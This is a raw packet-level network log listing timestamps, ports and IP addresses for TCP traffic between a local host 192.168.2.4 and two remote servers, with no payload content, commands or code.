Aug 10, 2024 16:12:25.191713095 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.191730022 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.191746950 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191761017 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191775084 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191790104 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191812038 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.191833019 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.192105055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.192117929 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.192132950 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.192183018 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.192250013 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.192271948 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.192286968 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.192300081 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.192313910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.192333937 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.192348957 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.196782112 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.196845055 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.196866989 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.196880102 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.196892977 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.196917057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.196932077 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.196944952 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.196945906 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.196959019 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.196969986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.196971893 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.196984053 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.196990013 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.197009087 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.197021008 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.197022915 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.197037935 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.197043896 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.197052956 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.197066069 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.197082043 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.197083950 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.197097063 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.197130919 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.197700024 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.197715044 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.197729111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.197779894 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.197808981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.197824001 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.197839022 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.197854042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.197901964 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.197901964 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.201956987 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.201971054 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.201983929 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.201998949 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202006102 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202013016 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202027082 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202028990 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202040911 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202060938 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202080011 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202094078 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202109098 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202116966 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202122927 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202136040 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202137947 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202151060 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202151060 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202167034 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202189922 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202213049 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202227116 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202241898 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202255964 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202286959 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202292919 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202306986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202322006 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202337027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202363014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202370882 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202429056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202441931 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202455997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202471018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202483892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202486038 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202496052 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202500105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202513933 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202514887 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202522993 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202528954 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202538967 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202555895 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202574968 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202589035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202603102 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202616930 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202620983 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202631950 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202640057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202655077 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202658892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202668905 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.202675104 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202691078 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.202698946 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217091084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217103004 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217180014 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217205048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217226982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217242956 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217257977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217302084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217302084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217302084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217302084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217322111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217371941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217386007 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217400074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217413902 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217428923 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217480898 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217480898 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217480898 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217480898 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217511892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217526913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217542887 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217555046 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217600107 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217600107 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217600107 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217600107 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217700005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217730045 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217745066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217770100 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217783928 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217798948 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217811108 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217811108 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217811108 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217811108 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217812061 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217833996 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217853069 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217859983 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217874050 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217888117 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217904091 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.217927933 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217927933 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.217993021 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218014002 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218028069 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218050957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218065023 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218079090 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218105078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218120098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218132973 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218143940 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218143940 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218143940 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218143940 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218173981 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218189001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218204021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218216896 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218241930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218255997 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218264103 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218264103 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218264103 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218264103 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218271971 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218285084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218300104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218314886 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218314886 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218314886 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218328953 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218344927 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218365908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218381882 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218470097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218483925 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218497038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218511105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218527079 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218535900 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218535900 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218535900 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218535900 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218540907 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218554974 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218571901 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218578100 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218585968 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218590975 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218615055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218628883 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218642950 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218676090 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218676090 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218676090 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218676090 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218681097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218694925 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218708992 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218723059 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218736887 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218746901 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218746901 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218751907 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218790054 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218802929 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218817949 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218821049 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218821049 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218864918 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218864918 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218864918 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218872070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218887091 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218902111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218918085 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.218950033 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.218962908 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.219057083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.219125032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.219140053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.219182014 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.219228029 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.219242096 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.219257116 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.219270945 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.219285011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.219320059 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.219320059 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.219320059 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.219439983 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.219454050 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.219470024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.219495058 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.219508886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.219522953 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.219537020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.219559908 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.219559908 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.219561100 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.219561100 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.219666004 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.220077991 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220092058 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220115900 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220129967 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220149040 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220175028 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.220175028 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.220175028 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.220175028 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.220235109 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220251083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220313072 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.220324993 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220340014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220354080 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220372915 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.220411062 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220417976 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.220426083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220439911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220454931 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220475912 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220513105 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.220513105 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.220515966 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220530033 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.220531940 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220546007 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220561981 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220577002 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220592022 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220602036 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.220602036 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.220604897 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.220628023 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.220679998 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.221066952 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.221081972 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.221095085 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.221116066 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.221159935 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.221184015 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.221208096 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.221223116 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.221265078 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.221265078 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.221326113 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.221340895 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.221371889 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.221426964 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.235287905 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.235302925 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.235371113 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.235375881 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.235718966 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.239289999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.239337921 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.239351988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.239366055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.239379883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.239389896 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.239396095 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.239399910 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.239412069 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.239417076 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.239427090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.239433050 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.239447117 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.239461899 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.258382082 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.258394957 CEST	443	49754	162.159.130.233	192.168.2.4
